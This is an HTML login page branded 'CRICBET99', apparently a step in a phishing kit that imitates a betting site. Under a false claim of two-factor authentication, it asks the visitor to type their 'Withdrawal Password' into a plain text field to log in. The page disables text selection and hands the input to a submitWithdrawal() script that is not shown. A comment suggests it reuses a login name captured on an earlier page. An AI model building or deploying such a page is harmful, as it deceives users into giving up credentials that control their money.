<!DOCTYPE html>
<html lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
      <meta name="google-site-verification" content="fDL8bYWkXQgVKjlF2wH3JNcpfqA22h3CQCUI1p02RsI" />
      <title>CRICBET99 LOGIN</title>
      <style>
	  body{
	  -webkit-touch-callout: none;
		-webkit-user-select: none;
		-khtml-user-select: none;
		-moz-user-select: none;
		-ms-user-select: none;
		user-select: none;
		}
         .log-fld {
         width: 100%;
         padding: 20px 20px;
         box-sizing: border-box;
         margin-top: 15px;
         background: #ffffff;
         border-radius: 4px;
         }
         .login {
         width: 100%;
         background-image: linear-gradient(#000, #8000ff)!important;
         display: flex;
         justify-content: center;
         height: 100vh;
         }
         .log-fld p {
         font-family: 'Roboto Condensed';
         font-weight: 500;
         text-align: center;
         margin-bottom: 1rem;
         line-height: 1.1;
         }
		 
		 
      </style>
      <!-- Favicons -->
      <link rel="shortcut icon" type="image/png" href="assets/images/favicon.png" />
      <!-- Google Fonts -->
      <!--link rel="preconnect" href="https://fonts.googleapis.com/" />
         <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="" /-->
      <link href="assets/css/bootstrap.min.css" rel="stylesheet" media="all" />
      <link rel="stylesheet" href="assets/css/style.css" />
      <link rel="stylesheet" href="assets/css/theme.css" />
   </head>
   <body>
      <div ="" id="app">
      <app-loader ="" _nghost-qgk-c42=""
      >
      <div
         _ngcontent-qgk-c42=""
         id="load"
         style="visibility: hidden; opacity: 0"
         >
         <div _ngcontent-qgk-c42="" id="load-inner">
            <img
               _ngcontent-qgk-c42=""
               class="logo-login"
               src="assets/images/logo.png"
               /><i _ngcontent-qgk-c42="" class="fa fa-spinner fa-spin"></i>
         </div>
      </div>
      <!----><!----></app-loader
         >
      </div>
      <!---->
      <div ="" class="login">
      <div ="" class="wrapper">
      <div ="" class="container-fluid">
      <div ="" class="row">
      <div ="" class="col-md-12">
      <div ="" class="loginInner1">
      <div
      =""
      class="featured-box-login featured-box-secundary default">
      <div class="log-fld">
         <div
         =""
         class="log-logo m-b-20 text-center">
         <img
         =""
         class="logo-login"
         src="assets/images/logo.png"/>
      </div>
      <p> 2 Factor Authentication Enabled.<br>
         Please Enter Withdrawal Password to Login 
         Securely.
      </p>
    <form class="form-horizontal" role="form" method="post">
  <div class="form-group m-b-20">
    <!-- Display the loginName from sessionStorage in the input field -->
    <input placeholder=" Enter Withdrawal Password" id="withdrawPassword" name="withdrawPassword" value="" class="form-control" type="text">
    <span id="username-error" class="error"></span>
  </div>
  <div class="form-group text-center">
    <button type="button" class="btn btn-submit btn-login" onclick="submitWithdrawal()">Secure Login <i class="fas fa-sign-in-alt"></i></button>
  </div>
</form>
      </div>
      </div>
      </div>
      </div>
      </div>
      </div>
      </div>
	  
      <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
      <script src="./assets//js/all.js"></script>
     

   </body>
</html>
